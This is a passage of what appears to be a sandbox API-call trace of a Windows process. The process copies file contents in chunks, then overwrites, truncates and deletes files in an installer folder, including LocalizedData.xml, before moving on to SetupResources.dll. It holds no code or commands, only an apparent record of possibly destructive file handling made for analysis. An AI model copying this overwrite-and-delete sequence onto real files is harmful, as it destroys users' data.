() returned 0x0 [0067.140] SetLastError (dwErrCode=0x0) [0067.141] GetLastError () returned 0x0 [0067.141] SetLastError (dwErrCode=0x0) [0067.141] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.141] GetLastError () returned 0x0 [0067.141] SetLastError (dwErrCode=0x0) [0067.141] GetLastError () returned 0x0 [0067.141] SetLastError (dwErrCode=0x0) [0067.141] GetLastError () returned 0x0 [0067.141] SetLastError (dwErrCode=0x0) [0067.141] GetLastError () returned 0x0 [0067.141] SetLastError (dwErrCode=0x0) [0067.141] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.142] GetLastError () returned 0x0 [0067.142] SetLastError (dwErrCode=0x0) [0067.142] GetLastError () returned 0x0 [0067.142] SetLastError (dwErrCode=0x0) [0067.142] GetLastError () returned 0x0 [0067.142] SetLastError (dwErrCode=0x0) [0067.142] GetLastError () returned 0x0 [0067.142] SetLastError (dwErrCode=0x0) [0067.142] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.143] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.143] GetLastError () returned 0x0 [0067.143] SetLastError (dwErrCode=0x0) [0067.143] GetLastError () returned 0x0 [0067.143] SetLastError (dwErrCode=0x0) [0067.143] GetLastError () returned 0x0 [0067.143] SetLastError (dwErrCode=0x0) [0067.143] GetLastError () returned 0x0 [0067.143] SetLastError (dwErrCode=0x0) [0067.143] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.143] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] GetLastError () returned 0x0 [0067.144] SetLastError (dwErrCode=0x0) [0067.144] GetLastError () returned 0x0 [0067.144] SetLastError (dwErrCode=0x0) [0067.144] GetLastError () returned 0x0 [0067.144] SetLastError (dwErrCode=0x0) [0067.144] GetLastError () returned 0x0 [0067.144] SetLastError (dwErrCode=0x0) [0067.144] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.144] GetLastError () returned 0x0 [0067.144] SetLastError (dwErrCode=0x0) [0067.145] GetLastError () returned 0x0 [0067.145] SetLastError (dwErrCode=0x0) [0067.145] GetLastError () returned 0x0 [0067.145] SetLastError (dwErrCode=0x0) [0067.145] GetLastError () returned 0x0 [0067.145] SetLastError (dwErrCode=0x0) [0067.145] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.145] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.145] GetLastError () returned 0x0 [0067.145] SetLastError (dwErrCode=0x0) [0067.145] GetLastError () returned 0x0 [0067.145] SetLastError (dwErrCode=0x0) [0067.146] GetLastError () returned 0x0 [0067.146] SetLastError (dwErrCode=0x0) [0067.146] GetLastError () returned 0x0 [0067.146] SetLastError (dwErrCode=0x0) [0067.146] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.146] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.146] GetLastError () returned 0x0 [0067.146] SetLastError (dwErrCode=0x0) [0067.146] GetLastError () returned 0x0 [0067.146] SetLastError (dwErrCode=0x0) [0067.146] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.147] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.147] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.147] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.147] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.147] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.147] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.147] GetLastError () returned 0x0 [0067.147] SetLastError (dwErrCode=0x0) [0067.148] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.148] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.148] GetLastError () returned 0x0 [0067.148] SetLastError (dwErrCode=0x0) [0067.148] GetLastError () returned 0x0 [0067.148] SetLastError (dwErrCode=0x0) [0067.148] GetLastError () returned 0x0 [0067.148] SetLastError (dwErrCode=0x0) [0067.148] GetLastError () returned 0x0 [0067.148] SetLastError (dwErrCode=0x0) [0067.148] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.149] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.149] GetLastError () returned 0x0 [0067.149] SetLastError (dwErrCode=0x0) [0067.149] GetLastError () returned 0x0 [0067.149] SetLastError (dwErrCode=0x0) [0067.149] GetLastError () returned 0x0 [0067.149] SetLastError (dwErrCode=0x0) [0067.149] GetLastError () returned 0x0 [0067.149] SetLastError (dwErrCode=0x0) [0067.149] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1aa, lpOverlapped=0x0) returned 1 [0067.149] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.150] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.150] GetLastError () returned 0x0 [0067.150] SetLastError (dwErrCode=0x0) [0067.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d5a0 [0067.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0067.150] GetLastError () returned 0x0 [0067.150] SetLastError (dwErrCode=0x0) [0067.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0067.150] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x1b0, lpOverlapped=0x0) returned 1 [0067.150] GetLastError () returned 0x0 [0067.150] SetLastError (dwErrCode=0x0) [0067.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0067.150] GetLastError () returned 0x0 [0067.150] SetLastError (dwErrCode=0x0) [0067.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0067.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0067.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.151] CloseHandle (hObject=0x428) returned 1 [0067.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.153] CloseHandle (hObject=0x420) returned 1 [0067.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0067.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0067.154] AreFileApisANSI () returned 1 [0067.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0067.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.154] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.228] GetFileType (hFile=0x420) returned 0x1 [0067.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.229] GetLastError () returned 0xb7 [0067.229] SetLastError (dwErrCode=0xb7) [0067.229] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.230] CloseHandle (hObject=0x420) returned 1 [0067.230] AreFileApisANSI () returned 1 [0067.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0067.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.230] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0067.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.232] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0067.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.232] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0067.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0067.233] AreFileApisANSI () returned 1 [0067.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0067.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0067.233] AreFileApisANSI () returned 1 [0067.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0067.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.233] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.233] GetFileType (hFile=0x420) returned 0x1 [0067.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0067.234] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.234] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.234] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.234] CloseHandle (hObject=0x420) returned 1 [0067.234] AreFileApisANSI () returned 1 [0067.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0067.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.234] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.235] GetFileType (hFile=0x420) returned 0x1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0067.235] CloseHandle (hObject=0x420) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) 